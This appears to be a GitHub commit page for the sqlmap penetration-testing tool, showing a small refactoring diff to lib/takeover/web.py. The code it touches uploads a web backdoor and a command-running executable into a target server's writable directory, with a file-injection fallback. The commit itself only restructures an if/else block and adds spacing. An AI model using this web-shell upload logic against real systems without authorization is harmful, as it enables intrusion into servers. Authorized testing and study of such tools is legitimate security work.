Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit 0df5b5f

Browse files
bdamelebdamele
committed
Minor bug fix and code adjustments
1 parent a0f5c3d commit 0df5b5f

1 file changed

Lines changed: 21 additions & 13 deletions

File tree

lib/takeover/web.py

Lines changed: 21 additions & 13 deletions
Original file line numberDiff line numberDiff line change
@@ -203,36 +203,44 @@ def webInit(self):
203203
runcmdName = "tmpe%s.exe" % randomStr(4)
204204
runcmdStream = decloakToNamedTemporaryFile(os.path.join(paths.SQLMAP_SHELL_PATH, 'runcmd.exe_'), runcmdName)
205205
match = re.search(r'input type=hidden name=scriptsdir value="([^"]+)"', uplPage)
206+
206207
if match:
207208
backdoorDirectory = match.group(1)
208209
else:
209210
continue
211+
210212
backdoorContent = originalBackdoorContent.replace("WRITABLE_DIR", backdoorDirectory).replace("RUNCMD_EXE", runcmdName)
211213
backdoorStream.file.truncate()
212214
backdoorStream.read()
213215
backdoorStream.seek(0)
214216
backdoorStream.write(backdoorContent)
217+
215218
if self.__webFileStreamUpload(backdoorStream, backdoorName, backdoorDirectory):
216219
self.__webFileStreamUpload(runcmdStream, runcmdName, backdoorDirectory)
217220
self.webBackdoorUrl = "%s/Scripts/%s" % (self.webBaseUrl.rstrip('/'), backdoorName)
218221
self.webDirectory = backdoorDirectory
219222
else:
220223
continue
221-
elif not self.__webFileStreamUpload(backdoorStream, backdoorName, posixToNtSlashes(directory) if kb.os == "Windows" else directory):
222-
warnMsg = "backdoor hasn't been successfully uploaded "
223-
warnMsg += "with uploader probably because of permission "
224-
warnMsg += "issues."
225-
logger.warn(warnMsg)
226-
message = "do you want to try the same method used "
227-
message += "for uploader? [y/N] "
228-
getOutput = readInput(message, default="N")
229-
if getOutput in ("y", "Y"):
230-
self.__webFileInject(backdoorContent, backdoorName, directory)
231-
else:
232-
continue
224+
225+
else:
226+
if not self.__webFileStreamUpload(backdoorStream, backdoorName, posixToNtSlashes(directory) if kb.os == "Windows" else directory):
227+
warnMsg = "backdoor hasn't been successfully uploaded "
228+
warnMsg += "with uploader probably because of permission "
229+
warnMsg += "issues."
230+
logger.warn(warnMsg)
231+
232+
message = "do you want to try the same method used "
233+
message += "for uploader? [y/N] "
234+
getOutput = readInput(message, default="N")
235+
236+
if getOutput in ("y", "Y"):
237+
self.__webFileInject(backdoorContent, backdoorName, directory)
238+
else:
239+
continue
240+
233241
self.webBackdoorUrl = "%s/%s" % (self.webBaseUrl, backdoorName)
234242
self.webDirectory = directory
235-
243+
236244
infoMsg = "the backdoor has probably been successfully "
237245
infoMsg += "uploaded on '%s', go with your browser " % self.webDirectory
238246
infoMsg += "to '%s' and enjoy it!" % self.webBackdoorUrl

0 commit comments

Comments
 (0)